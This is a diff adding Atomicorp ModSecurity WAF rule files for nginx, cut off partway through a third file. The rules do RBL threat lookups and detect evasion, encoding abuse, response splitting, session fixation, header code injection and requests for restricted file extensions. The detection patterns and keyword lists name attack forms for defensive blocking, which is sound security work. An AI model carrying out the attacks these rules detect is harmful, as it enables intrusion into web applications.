+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+SecAction "phase:1,id:343699,t:none,pass,nolog,noauditlog,initcol:ip=%{remote_addr}"
+
+#Skip on broken 2.8.0 boxes
+#SecRule MODSEC_BUILD "@gt 020777900" #phase:1,id:333777,rev:1,t:none,nolog,pass,skipAfter:END_TI
+
+SecRule REMOTE_ADDR "@ipMatchFromFile /etc/asl/whitelist" "phase:1,pass,t:none,id:328745,nolog,noauditlog,skipAfter:END_TI"
+
+SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" "phase:1,pass,t:none,id:328746,nolog,noauditlog,skipAfter:END_TI"
+
+#Is already on the threat1 RBL, dont bother looking it up, DROP the connection
+SecRule IP:threat1 "@eq 1" "phase:1,t:none,deny,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Threat Intelligence Match for known Worm Source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI Match)',severity:'1',id:350051,rev:1"
+
+#Dont look up the IP if we've checked it in the last 3m
+SecRule IP:PREVIOUS_LOOKUP "@eq 1" "phase:1,id:313134,t:none,pass,nolog,noauditlog,skipAfter:END_TI"
+SecAction "phase:1,t:none,id:343698,nolog,noauditlog,pass,setvar:ip.previous_lookup=1,expirevar:ip.previous_lookup=180"
+
+SecRule REMOTE_ADDR "@rbl threat1.atomicrbl.com." "phase:1,t:none,deny,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Threat Intelligence Match for known Worm Source on Atomicorp Threat Intelligence RBL (TI-1).  See this URL for details http://www.atomicrbl.com',severity:'1',setvar:ip.threat1=1,expirevar:ip.threat1=900,id:355500,rev:1"
+
+SecMarker END_TI
diff --git a/nginx-waf/00_asl_z_antievasion.conf b/nginx-waf/00_asl_z_antievasion.conf
new file mode 100644
index 0000000..3fc0943
--- /dev/null
+++ b/nginx-waf/00_asl_z_antievasion.conf
@@ -0,0 +1,60 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/modules/addon_file_editor/action_handler\.php" "phase:2,id:91001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/imp/compose\.php" "phase:2,id:91002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/file/ajax/" "phase:2,id:91003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/ajax/actions\.hsp" "phase:2,id:91004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/hallinta/hallinta-tiedostot\.php" "phase:2,id:91005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:91006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330791"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2019 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+#Detect request body processing errors
+SecRule REQBODY_ERROR "!@eq 0"         "phase:2,deny,t:none,status:400,msg:'Failed to parse request body.  This may be an impedence mismatch attack, a broken application or a broken connection.  This is not a false positive.  Check your application or client for errors.',id:'330791',rev:3,auditlog,log,logdata:'%{reqbody_error_msg}',severity:2,tag:'no_ar'"
+
+#Block malformed bodies
+#Workaround for Plesk HSP multipart messages which are really broken
+SecRule REQUEST_URI "^/supportcenter/server/"  "id:334356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:requestBodyAccess=off,tag:'no_ar'"
+
+SecRule REQBODY_PROCESSOR_ERROR "!@eq 0" "t:none,phase:2,deny,log,auditlog,status:400,msg:'Request Body Parsing Failed. %{REQBODY_PROCESSOR_ERROR_MSG}: check your application or client for errors, this is not a false positive.',id:'340152',rev:1,severity:'5'"
+
+# multipart/form-data name evasion attempts
+SecRule FILES|FILES_NAMES|!FILES:pic|!FILES:/tablerate/|!FILES:async-upload|!FILES:/^ticketattachment/ "[\";=]"   "capture,phase:2,deny,log,auditlog,id:390700,rev:7,t:none,t:urlDecodeUni,deny,status:403,msg:'Atomicorp.com WAF Rules: Evasion Attack: Invalid filename in FILES argument. Which may be a possible attempt at multipart/form-data bypass',logdata:'%{matched_var}'"
+
+
+
+
diff --git a/nginx-waf/00_asl_zz_strict.conf b/nginx-waf/00_asl_zz_strict.conf
new file mode 100644
index 0000000..5eb3c4c
--- /dev/null
+++ b/nginx-waf/00_asl_zz_strict.conf
@@ -0,0 +1,218 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/wp-admin/user-new\.php" "phase:2,id:91007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-permalink\.php" "phase:2,id:91008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:91009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/administrator/ajax-tab\.php" "phase:2,id:91010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:91011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:91012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/shop/admin/remote\.php" "phase:2,id:91013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/ts_manage\.php" "phase:2,id:91014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/phpmyadmin/import\.php" "phase:2,id:91015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330792"
+
+SecRule REQUEST_FILENAME "csfileshare/csfileshare\.cgi" "phase:2,id:91016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330792"
+
+SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:91017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/beheer\.php" "phase:2,id:91018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/wp-admin/async-upload\.php" "phase:2,id:91019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330791"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:91020,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/newreply\.php" "phase:2,id:91021,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/showmail\.php" "phase:2,id:91022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:91023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704,ctl:ruleRemovebyID=390708"
+
+SecRule REQUEST_FILENAME "/limesurvey/index\.php" "phase:2,id:91024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/modules/v7_pages_engine\.php" "phase:2,id:91025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:91026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/admin/updatepage\.php" "phase:2,id:91027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:91028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/colors\.css\.php" "phase:2,id:91029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/cgi-bin/potd/ir_potd_enter\.pl" "phase:2,id:91030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703,ctl:ruleRemovebyID=330793"
+
+SecRule REQUEST_FILENAME "/multilang/" "phase:2,id:91031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/soap\.hsp" "phase:2,id:91032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/index\.php/api/xmlrpc" "phase:2,id:91033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/amember/admin-users" "phase:2,id:91034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390721"
+
+SecRule REQUEST_FILENAME "/v2c/json/" "phase:2,id:91035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390721"
+
+SecRule REQUEST_FILENAME "/v2a/json/" "phase:2,id:91036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390721"
+
+SecRule REQUEST_FILENAME "/v1c/json/" "phase:2,id:91037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390721"
+
+SecRule REQUEST_FILENAME "/services/bmsubscribers\.json" "phase:2,id:91038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390721"
+
+SecRule REQUEST_FILENAME "/phpmyadmin/index\.php" "phase:2,id:91039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390722"
+
+SecRule REQUEST_FILENAME "/ipac20/ipac\.jsp" "phase:2,id:91040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390722"
+
+SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:91041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330791,ctl:ruleRemovebyID=330792,ctl:ruleRemovebyID=390722"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2019 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+
+#Detect possible evasion attempt
+SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0"         "phase:2,log,auditlog,t:none,pass,msg:'Multipart parser detected a possible unmatched boundary. This may be an impedence mismatch attack, a broken application or a broken connection.  This is not a false positive.  Check your application or client for errors.',id:'330792',rev:3,severity:5,tag:'no_ar'"
+
+#Disable below rule if filename contains a single quote
+SecRule MULTIPART_BOUNDARY_QUOTED               "@eq 0"         "t:none,id:330794,nolog,noauditlog,phase:1,chain,pass,ctl:ruleRemoveById=330793"
+  SecRule REQBODY_PROCESSOR_ERROR          	"@eq 0"         "t:none,chain"
+  SecRule MULTIPART_BOUNDARY_WHITESPACE         "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_DATA_BEFORE                 "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_DATA_AFTER                  "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_HEADER_FOLDING              "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_LF_LINE                     "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_INVALID_QUOTING             "@eq 1"         "t:none,chain"
+  SecRule MULTIPART_INVALID_HEADER_FOLDING      "@eq 0"         "t:none,chain"
+  SecRule MULTIPART_INVALID_PART    		"@eq 0"         "t:none,chain"
+  SecRule MULTIPART_FILE_LIMIT_EXCEEDED         "@eq 0"		"t:none"
+
+#Enforce strict multipart body checks
+SecRule MULTIPART_STRICT_ERROR "!@eq 0"         "phase:2,log,auditlog,t:none,deny,status:403,msg:'Multipart request body failed strict validation:  PE %{REQBODY_PROCESSOR_ERROR},  BQ %{MULTIPART_BOUNDARY_QUOTED},  BW %{MULTIPART_BOUNDARY_WHITESPACE},  DB %{MULTIPART_DATA_BEFORE},  DA %{MULTIPART_DATA_AFTER},  HF %{MULTIPART_HEADER_FOLDING},  LF %{MULTIPART_LF_LINE},  SM %{MULTIPART_SEMICOLON_MISSING},  IQ %{MULTIPART_INVALID_QUOTING},  IH %{MULTIPART_INVALID_HEADER_FOLDING},  IP %{MULTIPART_INVALID_PART},  FL %{MULTIPART_FILE_LIMIT_EXCEEDED}',id:'330793',rev:3,severity:2"
+
+SecRule TX:/^MSC_/ "!@streq 0"         "id:'350708',severity:'3',phase:2,log,auditlog,t:none,deny,status:403,msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'"
+
+SecRule INBOUND_DATA_ERROR "@eq 1" "phase:1,id:350709,deny,status:403,t:none,auditlog,log,msg:'Request Body Larger than SecRequestBodyLimit Setting',severity:'4'"
+SecRule OUTBOUND_DATA_ERROR "@eq 1" "phase:1,id:350710,deny,status:403,t:none,auditlog,log,msg:'Response Body Larger than SecResponseBodyLimit Setting',severity:'4'"
+
+SecRule REQUEST_METHOD "COOK" "capture,deny,log,auditlog,status:403,t:none,phase:1,id:314681,rev:1,severity:3,msg:'Atomicorp.com WAF Rules: Invalid HTTP method detected',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"         "chain,phase:2,t:none,log,auditlog,deny,status:400,msg:'Atomicorp.com WAF Rules: Possible URL Encoding Abuse Attack Attempt',id:'390703',rev:5,severity:'5'"
+SecRule REQUEST_URI "@validateUrlEncoding"
+
+SecRule REQUEST_HEADERS:Content-Type "^(text/xml|application/(soap|xml))"         "chain,id:374357,rev:3,phase:1,t:none,t:lowercase,pass,nolog,noauditlog"
+ SecRule REQBODY_PROCESSOR "!@streq XML" "ctl:requestBodyProcessor=XML"
+
+
+SecRule REQUEST_HEADERS:Content-Type "^(application\/x-www-form-urlencoded|text\/xml)(?:;(?:\s?charset\s?=\s?[\w\d\-]{1,18})?)??$"         "chain,phase:2,t:none,log,auditlog,deny,status:400,msg:'Atomicorp.com WAF Rules: Possible Encoding Abuse Attack Attempt',id:'390704',rev:1,severity:'5'"
+SecRule REQUEST_BODY|XML:/* "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" "chain"
+SecRule REQUEST_BODY|XML:/* "@validateUrlEncoding"
+
+#Check for suspiscious indicators, such as missing Host: headers, empty headers, numeric, etc.
+SecRule &REQUEST_HEADERS:Host "@eq 0"                 "chain,skipAfter:END_HOST_CHECK,phase:2,rev:2,t:none,pass,msg:'Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header',id:'331030',severity:'5',tag:'no_ar'"
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1"  "t:none"
+
+SecRule REQUEST_HEADERS:Host "^$"       "phase:2,rev:1,log,auditlog,t:none,pass,msg:'Atomicorp.com WAF Rules: Suspicious activity detected - Empty Host Header detected in HTTP request',id:'331031',severity:'5',tag:'no_ar'"
+
+SecRule REQUEST_HEADERS:Host "^[\d.:]+$" "chain,phase:2,rev:4,log,auditlog,t:none,pass,msg:'Atomicorp.com WAF Rules: Suspicious activity detected - Host header is a numeric IP address', severity:'2',id:'331032',severity:'5',tag:'no_ar'"
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1"  "t:none"
+
+SecMarker END_HOST_CHECK
+
+SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:373944,skipAfter:END_390717"
+
+#SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "%0[ad]content-(type|length) ?:"        "log,auditlog,deny,log,status:403,phase:2,rev:3,t:none,t:lowercase,t:compressWhitespace,capture,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  HTTP Response Splitting Attack',id:'390713',logdata:'%{TX.0}',severity:'2'"
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" "log,auditlog,deny,log,status:403,phase:2,rev:4,t:none,t:lowercase,t:compressWhitespace,capture,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  HTTP Response Splitting Attack',id:'390713',logdata:'%{TX.0}',severity:'2'"
+
+SecRule REQUEST_FILENAME "@rx [\n\r]" "id:390714,rev:2,severity:2,phase:1,deny,status:403,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: HTTP Splitting (CR/LF in request filename detected)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',log,auditlog"
+
+SecAction "phase:2,id:'391009',t:none,nolog,noauditlog,pass,setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsx/'"
+
+SecRule REQUEST_BASENAME "@rx \.([^.]+)$" "id:390716,rev:2,phase:2,deny,status:403,severity:3,capture,t:none,msg:'Atomicorp.com WAF Rules: URL file extension is restricted by policy',logdata:'%{TX.0}',setvar:'tx.extension=.%{tx.1}/',log,auditlog,chain"
+    SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_BODY|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "\%u[fF]{2}[0-9a-fA-F]{2}"   "log,auditlog,deny,log,status:403,chain,t:none,capture,phase:2,msg:'Atomicorp.com WAF Rules: Unicode Width Attack Attempt',id:'390621',rev:5,severity:'4',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!(%uFFFD)" "t:none"
+
+#bash style encoding evasion
+#/???
+SecRule REQUEST_URI|ARGS "\/\?\?\?/"    "phase:2,t:none,t:urlDecodeUni,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Command Line style Encoding Abuse Attack Attempt',id:'390763',rev:5,severity:'2'"
+
+
+#SecRule REQUEST_BODY "content-type ?:.*content-type ?:" "log,auditlog,deny,status:403,phase:2,rev:2,t:none,t:lowercase,t:compressWhitespace,capture,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  HTTP Response Splitting Attack',id:'390717',logdata:'%{TX.0}',severity:'2'"
+
+#session fixation attacks
+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer "@pm set-cookie .cookie jsessionid aspsessionid asp.net_sessionid phpsession phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession"         "phase:2,id:'333795',t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334360,t:none,pass,nolog,noauditlog,skipAfter:END_SESSION_FIX_PROTECTION"
+
+        SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:text "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)"                 "phase:2,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Atomicorp.com WAF Rules: Session Fixation Attack',id:'390708',rev:5,logdata:'%{TX.0}',severity:'2'"
+                SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)"                         "phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Atomicorp.com WAF Rules: Session Fixation Attack',id:'390718',rev:1,logdata:'%{TX.0}',severity:'2'"
+
+
+SecRule ARGS_NAMES "@pm jsessionid aspsessionid asp.net_sessionid phpsession phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession"        "log,auditlog,chain,phase:2,rev:1,t:none,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,status:403,msg:'Atomicorp.com WAF Rules: Possible Session Fixation attack',id:390739,logdata:'%{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2'"
+SecRule REQUEST_HEADERS:Referer "^(?:ht|f)tps?://(.*?)\/" "chain,capture"
+SecRule TX:1 "!@beginsWith %{request_headers.host}"
+
+SecMarker END_SESSION_FIX_PROTECTION
+
+SecMarker END_390717
+
+#Enforce proper requests per HTTP RFC
+SecRule REQUEST_LINE "!^(?:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$"     "chain,deny,status:403,t:none,t:lowercase,capture,phase:2,rev:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Invalid HTTP Request Line in violation of RFC (if you do not wish to follow HTTP RFCs, disable this rule)',id:'330700',severity:'4',logdata:'%{TX.0}'"
+#Java 1.6 doesnt seem to follow the RFC correctly
+SecRule REQUEST_HEADERS:User-Agent "^java/1\.6"
+
+SecRule &REQUEST_HEADERS:Proxy "@gt 0"      "deny,status:403,t:none,capture,phase:2,rev:2,log,auditlog,msg:'Atomicorp.com WAF Rules: client redefining HTTP_PROXY value denied',id:'330773',severity:'4',logdata:'%{TX.0}'"
+
+#Header sanitization
+#php code injection in select headers
+SecRule  REQUEST_HEADERS:X-Forwarded-For|REQUEST_HEADERS:X-Real-IP|REQUEST_HEADERS:Reverse-Via|REQUEST_HEADERS:X-Varnish|REQUEST_HEADERS:X-UA-Compatible|REQUEST_HEADERS:X-Powered-By|REQUEST_HEADERS:TE|REQUEST_HEADERS:X-REQUESTED-WITH|REQUEST_HEADERS:X-PIPER-ID|REQUEST_HEADERS:X-UCBROWSER-UA|REQUEST_HEADERS:X-WAP-PROFILE|REQUEST_HEADERS:X-EBO-UA|REQUEST_HEADERS:X-OPERAMINI-*|REQUEST_HEADERS:DEVICE-STOCK-UA|REQUEST_HEADERS:FORWARDED|REQUEST_HEADERS:WAP-CONNECTION|REQUEST_HEADERS:X-CONTENT-OPT "< ?\? ?"  "deny,status:403,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,rev:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Code injection in HTTP header attack blocked',id:'356331',severity:'1',logdata:'%{TX.0}'"
+
+#SecRule REQUEST_HEADERS:X-Forwarded-For "%" #SecRule REQUEST_HEADERS:X-Forwarded-For|REQUEST_HEADERS:X-ProxyUser-Ip "^[a-z0-9/ ,\:]+$" #  "phase:2,deny,status:403,id:356332,rev:3,t:none,t:lowercase,log,auditlog,msg:'Atomicorp.com WAF Rules: invalid character in X-Forwarded for header',severity:'3'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:><|\{\:\:)"   "phase:2,deny,status:403,id:356332,rev:1,t:none,t:urlDecodeUni,t:removewhitespace,log,auditlog,msg:'Atomicorp.com WAF Rules: invalid characters in User-Agent header',severity:'2'"
+
+#SecRule ARGS|!ARGS:_wp_http_referer|!ARGS:jsess|!ARGS:wp_http_referer|!ARGS:selection|!ARGS:permalink_structure|!ARGS:message|!ARGS:/post/|!ARGS:/dformat/|!ARGS:_u_b|!ARGS:state "@rx %[0-9a-fA-F]{2}" "id:390721,rev:5,phase:2,status:403,deny,log,auditlog,t:none,msg:'Atomicorp.com WAF Rules: Multiple URL Encoding Detected',logdata:'%{MATCHED_VAR}',severity:2"
+
+#Vpatching add on
+#Prevent Impedence mismatches on ARG names
+SecRule REQUEST_FILENAME "\.php" "chain,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,phase:2,deny,status:403,id:390720,rev:6,msg:'Atomicorp.com WAF Rules: Possible Impedence Mismatch attack on PHP appliction using space to start argument name',logdata:'%{TX.0}',severity:'1',tag:'no_ar',log,auditlog"
+SecRule ARGS_NAMES "^ " "t:none,t:utf8toUnicode,t:urlDecodeUni,t:removenulls,multimatch"
+#SecRule ARGS_NAMES "!^[\^\$0-9a-zA-Z\#_-\.@\{\}\[\]\(\)]+$"  "t:none,t:utf8toUnicode,t:urlDecodeUni"
+
+SecRule ARGS_GET|!ARGS_GET:enhancedcontentdata "@rx [\n\r]" "id:390722,rev:5,phase:2,status:403,deny,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,msg:'Atomicorp.com WAF Rules: HTTP Header Injection Attack via payload (CR/LF detected)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,severity:'CRITICAL'"
+
+
+
+
diff --git a/nginx-waf/01_asl_content.conf b/nginx-waf/01_asl_content.conf
new file mode 100644
index 0000000..1757d4f
--- /dev/null
+++ b/nginx-waf/01_asl_content.conf
@@ -0,0 +1,68 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/remote\.php/webdav/" "phase:2,id:91042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=391213"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2022 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
